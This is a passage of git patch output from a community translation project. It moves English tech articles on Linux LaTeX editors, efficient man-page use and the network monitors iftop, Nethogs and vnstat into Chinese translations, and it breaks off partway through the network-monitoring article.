insertions(+), 266 deletions(-) delete mode 100644 sources/tech/20171119 10 Best LaTeX Editors For Linux.md create mode 100644 translated/tech/20171119 10 Best LaTeX Editors For Linux.md diff --git a/sources/tech/20171119 10 Best LaTeX Editors For Linux.md b/sources/tech/20171119 10 Best LaTeX Editors For Linux.md deleted file mode 100644 index 19245889e3..0000000000 --- a/sources/tech/20171119 10 Best LaTeX Editors For Linux.md +++ /dev/null @@ -1,266 +0,0 @@ -FSSlc Translating - -10 Best LaTeX Editors For Linux -====== -**Brief: Once you get over the learning curve, there is nothing like LaTex. -Here are the best LaTex editors for Linux and other systems.** - -## What is LaTeX? - -[LaTeX][1] is a document preparation system. Unlike plain text editor, you -can't just write a plain text using LaTeX editors. Here, you will have to -utilize LaTeX commands in order to manage the content of the document. - -![LaTex Sample][2]![LaTex Sample][3] - -LaTex Editors are generally used to publish scientific research documents or -books for academic purposes. Most importantly, LaText editors come handy while -dealing with a document containing complex Mathematical notations. Surely, -LaTeX editors are fun to use. But, not that useful unless you have specific -needs for a document. - -## Why should you use LaTex? - -Well, just like I previously mentioned, LaTeX editors are meant for specific -purposes. You do not need to be a geek head in order to figure out the way to -use LaTeX editors but it is not a productive solution for users who deal with -basic text editors. - -If you are looking to craft a document but you are not interested in spending -time formatting the text, then LaTeX editors should be the one you should go -for. With LaTeX editors, you just have to specify the type of document, and -the text font and sizes will be taken care of accordingly. No wonder it is -considered one of the [best open source tools for writers][4]. - -Do note that it isn't something automated, you will have to first learn LaTeX -commands to let the editor handle the text formatting with precision. - -## 10 Of The Best LaTeX Editors For Linux - -Just for information, the list is not in any specific order. Editor at number -three is not better than the editor at number seven. - -### 1\. Lyx - -![][2] - -![][5] - -Lyx is an open source LaTeX Editor. In other words, it is one of the best -document processors available on the web.LyX helps you focus on the structure -of the write-up, just as every LaTeX editor should and lets you forget about -the word formatting. LyX would manage whatsoever depending on the type of -document specified. You get to control a lot of stuff while you have it -installed. The margins, headers/footers, spacing/indents, tables, and so on. - -If you are into crafting scientific documents, research thesis, or similar, -you will be delighted to experience Lyx's formula editor which should be a -charm to use. LyX also includes a set of tutorials to get started without much -of a hassle. - -[Lyx][6] - -### 2\. Texmaker - -![][2] - -![][7] - -Texmaker is considered to be one of the best LaTeX editors for GNOME desktop -environment. It presents a great user interface which results in a good user -experience. It is also crowned to be one among the most useful LaTeX editor -there is.If you perform PDF conversions often, you will find TeXmaker to be -relatively faster than other LaTeX editors. You can take a look at a preview -of what the final document would look like while you write. Also, one could -observe the symbols being easy to reach when needed. - -Texmaker also offers an extensive support for hotkeys configuration. Why not -give it a try? - -[Texmaker][8] - -### 3\. TeXstudio - -![][2] - -![][9] - -If you want a LaTeX editor which offers you a decent level of customizability -along with an easy-to-use interface, then TeXstudio would be the perfect one -to have installed. The UI is surely very simple but not clumsy. TeXstudio lets -you highlight syntax, comes with an integrated viewer, lets you check the -references and also bundles some other assistant tools. - -It also supports some cool features like auto-completion, link overlay, -bookmarks, multi-cursors, and so on - which makes writing a LaTeX document -easier than ever before. - -TeXstudio is actively maintained, which makes it a compelling choice for both -novice users and advanced writers. - -[TeXstudio][10] - -### 4\. Gummi - -![][2] - -![][11] - -Gummi is a very simple LaTeX editor based on the GTK+ toolkit. Well, you may -not find a lot of fancy options here but if you are just starting out - Gummi -will be our recommendation.It supports exporting the documents to PDF format, -lets you highlight syntax, and helps you with some basic error checking -functionalities. Though Gummi isn't actively maintained via GitHub it works -just fine. - -[Gummi][12] - -### 5\. TeXpen - -![][2] - -![][13] - -TeXpen is yet another simplified tool to go with. You get the auto-completion -functionality with this LaTeX editor. However, you may not find the user -interface impressive. If you do not mind the UI, but want a super easy LaTeX -editor, TeXpen could fulfill that wish for you.Also, TeXpen lets you -correct/improve the English grammar and expressions used in the document. - -[TeXpen][14] - -### 6\. ShareLaTeX - -![][2] - -![][15] - -ShareLaTeX is an online LaTeX editor. If you want someone (or a group of -people) to collaborate on documents you are working on, this is what you need. - -It offers a free plan along with several paid packages. Even the students of -Harvard University & Oxford University utilize this for their projects. With -the free plan, you get the ability to add one collaborator. - -The paid packages let you sync the documents on GitHub and Dropbox along with -the ability to record the full document history. You can choose to have -multiple collaborators as per your plan. For students, there's a separate -pricing plan available. - -[ShareLaTeX][16] - -### 7\. Overleaf - -![][2] - -![][17] - -Overleaf is yet another online LaTeX editor. Similar to ShareLaTeX, it offers -separate pricing plans for professionals and students. It also includes a free -plan where you can sync with GitHub, check your revision history, and add -multiple collaborators. - -There's a limit on the number of files you can create per project - so it -could bother if you are a professional working with LaTeX documents most of -the time. - -[Overleaf][18] - -### 8\. Authorea - -![][2] - -![][19] - -Authorea is a wonderful online LaTeX editor. However, it is not the best out -there - when considering the pricing plans. For free, it offers just 100 MB of -data upload limit and 1 private document at a time. The paid plans offer you -more perks but it may not be the cheapest from the lot.The only reason you -should choose Authorea is the user interface. If you love to work with a tool -offering an impressive user interface, there's no looking back. - -[Authorea][20] - -### 9\. Papeeria - -![][2] - -![][21] - -Papeeria is the cheapest LaTeX editor you can find on the Internet - -considering it is as reliable as the others. You do not get private projects -if you want to utilize it for free. But, if you prefer public projects it lets -you work on an unlimited number of projects with numerous collaborators. It -features a pretty simple plot builder and includes Git sync for no additional -cost.If you opt for the paid plan, it will empower you with the ability to -work on 10 private projects. - -[Papeeria][22] - -### 10\. Kile - -![Kile LaTeX editor][2] - -![Kile LaTeX editor][23] - -Last entry in our list of best LaTeX editor is Kile. Some people swear by -Kile. Primarily because of the features it provides. - -Kile is more than just an editor. It is an IDE tool like Eclipse that provides -a complete environment to work on documents and projects. Apart from quick -compilation and preview, you get features like auto-completion of commands, -insert citations, organize document in chapters etc. You really have to use -Kile to realize its true potential. - -Kile is available for Linux and Windows. - -[Kile][24] - -### Wrapping Up - -So, there go our recommendations for the LaTeX editors you should utilize on -Ubuntu/Linux. - -There are chances that we might have missed some interesting LaTeX editors -available for Linux. If you happen to know about any, let us know down in the -comments below. - - - - - --------------------------------------------------------------------------------- - -via: https://itsfoss.com/latex-editors-linux/ - -作者:[Ankush Das][a] -译者:[翻译者ID](https://github.com/翻译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://itsfoss.com/author/ankush/ -[1]:https://www.latex-project.org/ -[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= -[3]:https://itsfoss.com/wp-content/uploads/2017/11/latex-sample-example.jpeg -[4]:https://itsfoss.com/open-source-tools-writers/ -[5]:https://itsfoss.com/wp-content/uploads/2017/10/lyx_latex_editor.jpg -[6]:https://www.lyx.org/ -[7]:https://itsfoss.com/wp-content/uploads/2017/10/texmaker_latex_editor.jpg -[8]:http://www.xm1math.net/texmaker/ -[9]:https://itsfoss.com/wp-content/uploads/2017/10/tex_studio_latex_editor.jpg -[10]:https://www.texstudio.org/ -[11]:https://itsfoss.com/wp-content/uploads/2017/10/gummi_latex_editor.jpg -[12]:https://github.com/alexandervdm/gummi -[13]:https://itsfoss.com/wp-content/uploads/2017/10/texpen_latex_editor.jpg -[14]:https://sourceforge.net/projects/texpen/ -[15]:https://itsfoss.com/wp-content/uploads/2017/10/sharelatex.jpg -[16]:https://www.sharelatex.com/ -[17]:https://itsfoss.com/wp-content/uploads/2017/10/overleaf.jpg -[18]:https://www.overleaf.com/ -[19]:https://itsfoss.com/wp-content/uploads/2017/10/authorea.jpg -[20]:https://www.authorea.com/ -[21]:https://itsfoss.com/wp-content/uploads/2017/10/papeeria_latex_editor.jpg -[22]:https://www.papeeria.com/ -[23]:https://itsfoss.com/wp-content/uploads/2017/11/kile-latex-800x621.png -[24]:https://kile.sourceforge.io/ diff --git a/translated/tech/20171119 10 Best LaTeX Editors For Linux.md b/translated/tech/20171119 10 Best LaTeX Editors For Linux.md new file mode 100644 index 0000000000..9b4650ac97 --- /dev/null +++ b/translated/tech/20171119 10 Best LaTeX Editors For Linux.md @@ -0,0 +1,184 @@ +针对 Linux 平台的 10 款最好 LaTeX 编辑器 +====== +**简介:一旦你克服了 LaTeX 的学习曲线,就没有什么比得上 LaTeX 了。下面介绍的是针对 Linux 和其他平台的最好的 LaTeX 编辑器。** + +## LaTeX 是什么? + +[LaTeX][1] 是一个文档制作系统。与纯文本编辑器不同,在 LaTeX 编辑器中你不能只写纯文本,为了组织文档的内容,你还必须使用一些 LaTeX 命令。 + +![LaTeX 示例][2]![LaTeX 示例][3] + +LaTeX 编辑器一般用在出于学术目的的科学研究文档或书籍的出版,最重要的是,当你需要处理包含众多复杂数学符号的文档时,它能够为你带来方便。当然,使用 LaTeX 编辑器是很有趣的,但它也并非总是很有用,除非你对所要编写的文档有一些特别的需求。 + +## 为什么你应当使用 LaTeX? + +好吧,正如我前面所提到的那样,使用 LaTeX 编辑器便意味着你有着特定的需求。为了捣腾 LaTeX 编辑器,并不需要你有一颗极客的头脑。但对于那些使用一般文本编辑器的用户来说,它并不是一个很有效率的解决方法。 + +假如你正在寻找一款工具来精心制作一篇文档,同时你对花费时间在格式化文本上没有任何兴趣,那么 LaTeX 编辑器或许正是你所寻找的那款工具。在 LaTeX 编辑器中,你只需要指定文档的类型,它便会相应地为你设置好文档的字体种类和大小尺寸。正是基于这个原因,难怪它会被认为是 [给作家的最好开源工具][4] 之一。 + +但请务必注意: LaTeX 编辑器并不是自动化的工具,你必须首先学会一些 LaTeX 命令来让它能够精确地处理文本的格式。 + +## 针对 Linux 平台的 10 款最好 LaTeX 编辑器 + +事先说明一下,以下列表并没有一个明确的先后顺序,序号为 3 的编辑器并不一定比序号为 7 的编辑器优秀。 + +### 1\. LyX + +![][2] + +![][5] + +LyX 是一个开源的 LaTeX 编辑器,即是说它是网络上可获取到的最好的文档处理引擎之一。LyX 帮助你集中于你的文章,并忘记对单词的格式化,而这些正是每个 LaTeX 编辑器应当做的。LyX 能够让你根据文档的不同,管理不同的文档内容。一旦安装了它,你就可以控制文档中的很多东西了,例如页边距,页眉,页脚,空白,缩进,表格等等。 + +假如你正忙着精心撰写科学性的文档,研究论文或类似的文档,你将会很高兴能够体验到 LyX 的公式编辑器,这也是其特色之一。 LyX 还包括一系列的教程来入门,使得入门没有那么多的麻烦。 + +[LyX][6] + +### 2\. Texmaker + +![][2] + +![][7] + +Texmaker 被认为是 GNOME 桌面环境下最好的 LaTeX 编辑器之一。它呈现出一个非常好的用户界面,带来了极好的用户体验。它也被冠以最实用的 LaTeX 编辑器之一。假如你经常进行 PDF 的转换,你将发现 TeXmaker 相比其他编辑器更加快速。在你书写的同时,你也可以预览你的文档最终将是什么样子的。同时,你也可以观察到可以很容易地找到所需要的符号。 + +Texmaker 也提供一个扩展的快捷键支持。你有什么理由不试着使用它呢? + +[Texmaker][8] + +### 3\. TeXstudio + +![][2] + +![][9] + +假如你想要一个这样的 LaTeX 编辑器:它既能为你提供相当不错的自定义功能,又带有一个易用的界面,那么 TeXstudio 便是一个完美的选择。它的 UI 确实很简单,但是不粗糙。 TeXstudio 带有语法高亮,自带一个集成的阅读器,可以让你检查参考文献,同时还带有一些其他的辅助工具。 + +它同时还支持某些酷炫的功能,例如自动补全,链接覆盖,书签,多游标等等,这使得书写 LaTeX 文档变得比以前更加简单。 + +TeXstudio 的维护很活跃,对于新手或者高级写作者来说,这使得它成为一个引人注目的选择。 + +[TeXstudio][10] + +### 4\. Gummi + +![][2] + +![][11] + +Gummi 是一个非常简单的 LaTeX 编辑器,它基于 GTK+ 工具箱。当然,在这个编辑器中你找不到许多华丽的选项,但如果你只想能够立刻着手写作, 那么 Gummi 便是我们给你的推荐。它支持将文档输出为 PDF 格式,支持语法高亮,并帮助你进行某些基础的错误检查。尽管在 GitHub 上它已经不再被活跃地维护,但它仍然工作地很好。 + +[Gummi][12] + +### 5\. TeXpen + +![][2] + +![][13] + +TeXpen 是另一个简洁的 LaTeX 编辑器。它为你提供了自动补全功能。但其用户界面或许不会让你感到印象深刻。假如你对用户界面不在意,又想要一个超级容易的 LaTeX 编辑器,那么 TeXpen 将满足你的需求。同时 TeXpen 还能为你校正或提高在文档中使用的英语语法和表达式。 + +[TeXpen][14] + +### 6\. ShareLaTeX + +![][2] + +![][15] + +ShareLaTeX 是一款在线 LaTeX 编辑器。假如你想与某人或某组朋友一同协作进行文档的书写,那么这便是你所需要的。 + +它提供一个免费方案和几种付费方案。甚至来自哈佛大学和牛津大学的学生也都使用它来进行个人的项目。其免费方案还允许你添加一位协作者。 + +其付费方案允许你与 GitHub 和 Dropbox 进行同步,并且能够记录完整的文档修改历史。你可以为你的每个方案选择多个协作者。对于学生,它还提供单独的计费方案。 + +[ShareLaTeX][16] + +### 7\. Overleaf + +![][2] + +![][17] + +Overleaf 是另一款在线的 LaTeX 编辑器。它与 ShareLaTeX 类似,它为专家和学生提供了不同的计费方案。它也提供了一个免费方案,使用它你可以与 GitHub 同步,检查你的修订历史,或添加多个合作者。 + +在每个项目中,它对文件的数目有所限制。所以在大多数情况下如果你对 LaTeX 文件非常熟悉,这并不会为你带来不便。 + +[Overleaf][18] + +### 8\. Authorea + +![][2] + +![][19] + +Authorea 是一个美妙的在线 LaTeX 编辑器。当然,如果考虑到价格,它可能不是最好的一款。对于免费方案,它有 100 MB 的数据上传限制和每次只能创建一个私有文档。而付费方案则提供更多的额外好处,但如果考虑到价格,它可能不是最便宜的。你应该选择 Authorea 的唯一原因应该是因为其用户界面。假如你喜爱使用一款提供令人印象深刻的用户界面的工具,那就不要错过它。 + +[Authorea][20] + +### 9\. Papeeria + +![][2] + +![][21] + +Papeeria 是在网络上你能够找到的最为便宜的 LaTeX 在线编辑器,如果考虑到它和其他的编辑器一样可信赖的话。假如你想免费地使用它,则你不能使用它开展私有项目。但是,如果你更偏爱公共项目,它允许你创建不限数目的项目,添加不限数目的协作者。它的特色功能是有一个非常简便的画图构造器,并且在无需额外费用的情况下使用 Git 同步。假如你偏爱付费方案,它赋予你创建 10 个私有项目的能力。 + +[Papeeria][22] + +### 10\. Kile + +![Kile LaTeX 编辑器][2] + +![Kile LaTeX 编辑器][23] + +位于我们最好 LaTeX 编辑器清单的最后一位是 Kile 编辑器。有些朋友对 Kile 推崇备至,很大程度上是因为其提供某些特色功能。 + +Kile 不仅仅是一款编辑器,它还是一款类似 Eclipse 的 IDE 工具,提供了针对文档和项目的一整套环境。除了快速编译和预览功能,你还可以使用诸如命令的自动补全,插入引用,按照章节来组织文档等功能。你真的应该使用 Kile 来见识其潜力。 + +Kile 在 Linux 和 Windows 平台下都可获取到。 + +[Kile][24] + +### 总结 + +所以上面便是我们推荐的 LaTeX 编辑器,你可以在 Ubuntu 或其他 Linux 发行版本中使用它们。 + +当然,我们可能还遗漏了某些可以在 Linux 上使用并且有趣的 LaTeX 编辑器。如若你正好知道它们,请在下面的评论中让我们知晓。 + + +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/LaTeX-editors-linux/ + +作者:[Ankush Das][a] +译者:[FSSlc](https://github.com/FSSlc) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/ankush/ +[1]:https://www.LaTeX-project.org/ +[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs= +[3]:https://itsfoss.com/wp-content/uploads/2017/11/LaTeX-sample-example.jpeg +[4]:https://itsfoss.com/open-source-tools-writers/ +[5]:https://itsfoss.com/wp-content/uploads/2017/10/LyX_LaTeX_editor.jpg +[6]:https://www.LyX.org/ +[7]:https://itsfoss.com/wp-content/uploads/2017/10/texmaker_LaTeX_editor.jpg +[8]:http://www.xm1math.net/texmaker/ +[9]:https://itsfoss.com/wp-content/uploads/2017/10/tex_studio_LaTeX_editor.jpg +[10]:https://www.texstudio.org/ +[11]:https://itsfoss.com/wp-content/uploads/2017/10/gummi_LaTeX_editor.jpg +[12]:https://github.com/alexandervdm/gummi +[13]:https://itsfoss.com/wp-content/uploads/2017/10/texpen_LaTeX_editor.jpg +[14]:https://sourceforge.net/projects/texpen/ +[15]:https://itsfoss.com/wp-content/uploads/2017/10/shareLaTeX.jpg +[16]:https://www.shareLaTeX.com/ +[17]:https://itsfoss.com/wp-content/uploads/2017/10/overleaf.jpg +[18]:https://www.overleaf.com/ +[19]:https://itsfoss.com/wp-content/uploads/2017/10/authorea.jpg +[20]:https://www.authorea.com/ +[21]:https://itsfoss.com/wp-content/uploads/2017/10/papeeria_LaTeX_editor.jpg +[22]:https://www.papeeria.com/ +[23]:https://itsfoss.com/wp-content/uploads/2017/11/kile-LaTeX-800x621.png +[24]:https://kile.sourceforge.io/ From 2cd1bc882948b1feb5abf8b0f9e4b209d99e12b4 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 22 Dec 2017 23:16:33 +0800 Subject: [PATCH 0757/1627] PRF&PUB:20171215 Learn To Use Man Pages Efficiently.md @lujun9972 https://linux.cn/article-9165-1.html --- ...1215 Learn To Use Man Pages Efficiently.md | 101 ++++++++++-------- 1 file changed, 57 insertions(+), 44 deletions(-) rename {translated/tech => published}/20171215 Learn To Use Man Pages Efficiently.md (57%) diff --git a/translated/tech/20171215 Learn To Use Man Pages Efficiently.md b/published/20171215 Learn To Use Man Pages Efficiently.md similarity index 57% rename from translated/tech/20171215 Learn To Use Man Pages Efficiently.md rename to published/20171215 Learn To Use Man Pages Efficiently.md index 4ab4083e0c..9eafc93d50 100644 --- a/translated/tech/20171215 Learn To Use Man Pages Efficiently.md +++ b/published/20171215 Learn To Use Man Pages Efficiently.md @@ -1,6 +1,7 @@ -学习如何高效地使用 Man 页 +学习如何高效地使用 man 页 ====== -不久前,我们发布了一篇简短的指引描述了如何轻易地[回忆起忘记的 Linux 命令 ][1]。那篇指引对于无法记住命令的人来说真的非常有用。今天,我们就来学习一下如何高效而又迅速第从 man 页中获取你所需要的信息。如你所知,一个标准的 man 页分成很多个部分,每部分都有一个独立的标题。当你想查看特定的标志/选项时,可能需要向下滚动很长时间才能找到。这这是个效率底下而且很耗时间的过程。这也是为什么学会高效使用 man 页来精确定位你想要的内容非常的重要。 + +不久前,我们发布了一篇简短的指引描述了如何轻易地[回忆起忘记的 Linux 命令 ][1]。那篇指引对于无法记住命令的人来说真的非常有用。今天,我们就来学习一下如何高效而又迅速地从 man 页中获取你所需要的信息。如你所知,一个标准的 man 页分成很多个部分,每部分都有一个独立的标题。当你想查看特定的标志/选项时,可能需要向下滚动很长时间才能找到。这是个效率底下而且很耗时间的过程。这也是为什么学会高效使用 man 页来精确定位你想要的内容。 在本文中,我会分享一些常用的跟 man 页相关的重要技巧。 @@ -8,27 +9,30 @@ #### 基础用法 -我们都知道,我们可以使用类似下面的命令来打开关于某个命令(比如 “mkdir”) 的 man 页: +我们都知道,我们可以使用类似下面的命令来打开关于某个命令(比如 `mkdir`)的 man 页: + ``` man mkdir ``` -可以使用 **spacebar**,**d**,**b** 以及 **up** / **down** 箭头来浏览 man 页。要跳转道 man 页的末尾,可以按 **End** 键而想跳转到 man 页的头部则可以按 **Home** 键。在当前打开的 man 页中按下 **h** 键会显示所有有用的键盘快捷键和一般用法。 +可以使用 `空格`,`d`,`b` 以及上下箭头等来浏览 man 页。要跳转道 man 页的末尾,可以按 `End` 键而想跳转到 man 页的头部则可以按 `Home` 键。在当前打开的 man 页中按下 `h` 键会显示所有有用的键盘快捷键和一般用法。(LCTT 译注:这些快捷键其实是 man 所使用的 less 分页器的快捷键) -[![][2]][3] +![][3] -按 **q** 可以退出 man 页。 +按 `q` 可以退出 man 页。 #### 回忆起忘记的命令 对于那些不知道想要哪个命令的家伙,可以去查看一下我第一段中提到的那个链接。使用 man 页我们也能做到这一点。假设说,你想要创建一个目录,而你忘记了使用哪个命令来创建目录。 -为了回忆起那个忘记的命令,可以将 man 和 grep 命令联用: +为了回忆起那个忘记的命令,可以将 man 和 `grep` 命令联用: + ``` man -k directory | grep create ``` 输出结果为: + ``` CURLOPT_NEW_DIRECTORY_PERMS (3) - permissions for remotely created directories libssh2_sftp_mkdir_ex (3) - create a directory on the remote file system @@ -43,126 +47,135 @@ mktemp (1) - create a temporary file or directory pam_mkhomedir (8) - PAM module to create users home directory ``` -[![][2]][4] +![][4] -你只需要阅读一下每个命令的描述然后挑选出合适的命令就行了。啊,现在你记起来了。**mkdir** 正式你想要的,对吧?就是那么简单。 +你只需要阅读一下每个命令的描述然后挑选出合适的命令就行了。啊,现在你记起来了。`mkdir` 正式你想要的,对吧?就是那么简单。 #### 在 man 页中搜索 -若你在 man 页中想要查找特定字符串。只需要输入 **/** (前斜线) 再加上你想要搜索的字符串,像这样 +若你在 man 页中想要查找特定字符串。只需要输入 `/` (前斜线)再加上你想要搜索的字符串,像这样: + ``` -/ or +/ ``` -假设你正在查看 mount 命令的 man 页,想要寻找关于 **- bind** 选项的相关信息。可以输入: +假设你正在查看 `mount` 命令的 man 页,想要寻找关于 `-bind` 选项的相关信息。可以输入: + ``` /bind ``` -[![][2]][5] +![][5] 当前 man 页中任何匹配搜索字符串的内容都会被高亮显示。 -[![][2]][6] +![][6] -按下 **"n"** 和 **"SHIFT+n"** 来查看下一个/上一个匹配的地方。 +按下 `n` 和 `SHIFT+n` 来查看下一个/上一个匹配的地方。 + +`/` 模式(或者说字符串)会向前搜索匹配行。你也可以使用 `?` 模式进行向后搜索。这当你在 man 页的末尾或中间位置时非常有用。 -/模式(或者说字符串) - 会向前搜索匹配行。你也可以使用 **?pattern** 进行向后搜索。这当你在 man 页的末尾或中间位置时非常有用。 ``` -?bind +?bind ``` 若想只显示匹配行,输入: + ``` &bind ``` -[![][2]][7] +![][7] -使用这种方法,你无需使用 "n" 和 "shift+n" 来滚动道下一个/上一个匹配的位置。**& pattern** 只会显示那些包含搜索内容的行,其他的内容全都被省略掉。 +使用这种方法,你无需使用 `n` 和 `SHIFT+n` 来滚动到下一个/上一个匹配的位置。`&` 模式只会显示那些包含搜索内容的行,其他的内容全都被省略掉。 -#### Search matches without opening man page +#### 不打开 man 页而进行搜索 也可以在不打开 man 页的前提下搜索指定选项的信息。 -比如,你想了解 **mkdir** 命令中的 **-m** 选项的相关信息。可以运行: +比如,你想了解 `mkdir` 命令中的 `-m` 选项的相关信息。可以运行: + ``` man mkdir | grep -e '-m' ``` 或者, + ``` man mkdir | grep -- '-m' ``` -[![][2]][8] +![][8] -这个命令会显示出 mkdir 命令 man 页中 **第一次出现** **-m** 时的内容。从上面命令中我们可以看到 -m 表示的是 MODE (chmod)。 +这个命令会显示出 `mkdir` 命令 man 页中第一次出现 `-m` 时的内容。从上面命令中我们可以看到 `-m` 表示的是 “MODE”(`chmod`)。 + +如果你想阅读 `mkdir` 命令的完整 man 页,但是要跳过第一次出现 `-m` 之前的内容,可以使用下面命令: -如果你想阅读 mkdir 命令的完整 man 页,但是要跳过第一次出现 **-m** 之前的内容,可以使用下面命令: ``` man mkdir | less +/-m ``` -[![][2]][9] +![][9] 这是另一个例子: + ``` man mount | less +/--bind ``` -[![][2]][10] +![][10] -按下 "n" 或 "SHIFT+n" 可以浏览下一个/上一个匹配的位置。 +按下 `n` 或 `SHIFT+n` 可以浏览下一个/上一个匹配的位置。 -参考阅读 :[3 Good Alternatives To Man Pages Every Linux User Should Know][11] +参考阅读:[每个 Linux 用户都应该知道的 3 个 man 页替代品][11]。 -#### 将完整的 man 页导出道文本文件中 +#### 将完整的 man 页导出到文本文件中 我们可以将指定命令的完整 man 页导出成文本文件。方法是运行下面命令: + ``` man mount > mount.txt ``` -该命令会将 mount 命令的 man 页导出到当前目录的 mount.txt 文件中。 +该命令会将 `mount` 命令的 man 页导出到当前目录的 `mount.txt` 文件中。 也可以获取一个简化版的 man 页,没有退格和下划线,方法是使用下面命令。 + ``` man mount | col -b > mount.txt ``` 要了解更多关于 man 页的详细信息,运行: + ``` man man ``` -该命令会显示出关于 man 页的 man 页。这些技巧都很基础但很实用。它们会节省你很多的时间而且能免去很多的滚动操作。 +该命令会显示出关于 man 的 man 页。这些技巧都很基础但很实用。它们会节省你很多的时间而且能免去很多的滚动操作。 今天的内容就到这了。希望对你有帮助。更多好文即将到来。准备好哦! Cheers! - - -------------------------------------------------------------------------------- via: https://www.ostechnix.com/learn-use-man-pages-efficiently/ -作者:[][a] +作者:[SK][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 -[a]:https://www.ostechnix.com +[a]:https://www.ostechnix.com/author/sk/ [1]:https://www.ostechnix.com/easily-recall-forgotten-linux-commands/ [2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 -[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-4.png () -[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-3.png () -[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-5.png () -[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-6.png () -[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-8.png () -[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-1.png () -[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-2-1.png () -[10]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-7.png () +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-4.png +[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-3.png +[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-5.png +[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-6.png +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-8.png +[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-1.png +[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-2-1.png +[10]:http://www.ostechnix.com/wp-content/uploads/2017/12/man-pages-7.png [11]:https://www.ostechnix.com/3-good-alternatives-man-pages-every-linux-user-know/ From 10979cbd6cefff5bdc182126a5ba61c5a86e84b6 Mon Sep 17 00:00:00 2001 From: nodekey Date: Sat, 23 Dec 2017 00:56:51 +0800 Subject: [PATCH 0758/1627] translated --- ...Simple Excellent Linux Network Monitors.md | 190 ------------------ ...Simple Excellent Linux Network Monitors.md | 190 ++++++++++++++++++ 2 files changed, 190 insertions(+), 190 deletions(-) delete mode 100644 sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md create mode 100644 translated/tech/20171019 3 Simple Excellent Linux Network Monitors.md diff --git a/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md b/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md deleted file mode 100644 index 7dcf21a7a7..0000000000 --- a/sources/tech/20171019 3 Simple Excellent Linux Network Monitors.md +++ /dev/null @@ -1,190 +0,0 @@ -3 Simple, Excellent Linux Network Monitors -============================================================ -KeyLD translating - -![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network") -Learn more about your network connections with the iftop, Nethogs, and vnstat tools.[Used with permission][3] - -You can learn an amazing amount of information about your network connections with these three glorious Linux networking commands. iftop tracks network connections by process number, Nethogs quickly reveals what is hogging your bandwidth, and vnstat runs as a nice lightweight daemon to record your usage over time. - -### iftop - -The excellent [iftop][8] listens to the network interface that you specify, and displays connections in a top-style interface. - -This is a great little tool for quickly identifying hogs, measuring speed, and also to maintain a running total of your network traffic. It is rather surprising to see how much bandwidth we use, especially for us old people who remember the days of telephone land lines, modems, screaming kilobits of speed, and real live bauds. We abandoned bauds a long time ago in favor of bit rates. Baud measures signal changes, which sometimes were the same as bit rates, but mostly not. - -If you have just one network interface, run iftop with no options. iftop requires root permissions: - -``` -$ sudo iftop -``` - -When you have more than one, specify the interface you want to monitor: - -``` -$ sudo iftop -i wlan0 -``` - -Just like top, you can change the display options while it is running. - -* **h** toggles the help screen. - -* **n** toggles name resolution. - -* **s** toggles source host display, and **d** toggles the destination hosts. - -* **s** toggles port numbers. - -* **N** toggles port resolution; to see all port numbers toggle resolution off. - -* **t** toggles the text interface. The default display requires ncurses. I think the text display is more readable and better-organized (Figure 1). - -* **p** pauses the display. - -* **q** quits the program. - - -![text display](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_8.png?itok=luKHS5ve "text display") -Figure 1: The text display is readable and organized.[Used with permission][1] - -When you toggle the display options, iftop continues to measure all traffic. You can also select a single host to monitor. You need the host's IP address and netmask. I was curious how much of a load Pandora put on my sad little meager bandwidth cap, so first I used dig to find their IP address: - -``` -$ dig A pandora.com -[...] -;; ANSWER SECTION: -pandora.com. 267 IN A 208.85.40.20 -pandora.com. 267 IN A 208.85.40.50 -``` - -What's the netmask? [ipcalc][9] tells us: - -``` -$ ipcalc -b 208.85.40.20 -Address: 208.85.40.20 -Netmask: 255.255.255.0 = 24 -Wildcard: 0.0.0.255 -=> -Network: 208.85.40.0/24 -``` - -Now feed the address and netmask to iftop: - -``` -$ sudo iftop -F 208.85.40.20/24 -i wlan0 -``` - -Is that not seriously groovy? I was surprised to learn that Pandora is easy on my precious bits, using around 500Kb per hour. And, like most streaming services, Pandora's traffic comes in spurts and relies on caching to smooth out the lumps and bumps. - -You can do the same with IPv6 addresses, using the **-G** option. Consult the fine man page to learn the rest of iftop's features, including customizing your default options with a personal configuration file, and applying custom filters (see [PCAP-FILTER][10] for a filter reference). - -### Nethogs - -When you want to quickly learn who is sucking up your bandwidth, Nethogs is fast and easy. Run it as 